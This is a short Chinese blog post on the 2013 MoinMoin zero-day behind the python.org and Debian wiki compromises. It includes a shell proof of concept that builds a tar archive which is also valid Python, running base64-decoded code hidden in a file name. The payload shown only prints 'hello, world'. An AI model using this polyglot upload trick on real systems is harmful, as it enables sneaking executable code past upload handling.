moin moin wiki的0day,日了python.org,再日debian.org。

Python声明

http://pyfound.blogspot.com/2013/01/wikipythonorg-compromised.html

Debian声明

http://lists.debian.org/debian-devel-announce/2013/01/msg00000.html

$ touch "exec __import__('base64').b64decode('cHJpbnQgImhlbGxvLCB3b3JsZCI=')"            
$ tar cf result.py !$
tar cf result.py "exec __import__('base64').b64decode('cHJpbnQgImhlbGxvLCB3b3JsZCI=')"
$ python result.py 
hello, world
$ tar xvf result.py
x exec __import__('base64').b64decode('cHJpbnQgImhlbGxvLCB3b3JsZCI=')
$

这个是0day的PoC。。。。

简单的说,就是一个上传,既是合法的tar文件,又是合法的python代码。omg碉堡了。

今天Ruby on Rails也被日了。

什么时候来日django?

via 1, 2, 3

Comments